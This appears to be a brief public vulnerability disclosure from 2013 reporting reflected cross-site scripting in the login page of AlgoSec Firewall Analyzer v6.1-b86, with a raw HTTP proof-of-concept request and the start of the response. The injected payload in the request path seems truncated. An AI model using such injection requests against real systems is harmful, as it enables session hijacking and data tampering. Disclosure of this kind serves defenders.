AlgoSec Firewall Analyzer Version v6.1-b86 cross-site scripting (XSS) Vulnerability ================================================================================================================================================================ AlgoSec Firewall Analyzer Version v6.1-b86 cross-site scripting (XSS) Vulnerability ================================================================================================================================================================ #Date- 7/8/2013 # code by Asheesh kumar Mani Tripathi # Credit by Asheesh Anaconda #Vulnerbility AlgoSec Firewall Analyzer is prone to an cross-site scripting (XSS) Vulnerability because the application fails to properly sanitize user-supplied input #Impact A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities ======================================================================================================================== Request ======================================================================================================================== GET /afa/php/Login.php/>'> HTTP/1.1 Host: 172.28.154.163 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Cookie: PHPSESSID=3ihq73ut5ivc5spnnbm65vuiu1 ======================================================================================================================== Response ======================================================================================================================== HTTP/1.1 200 OK Date: Wed, 7 Aug 2013 15:59:23 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6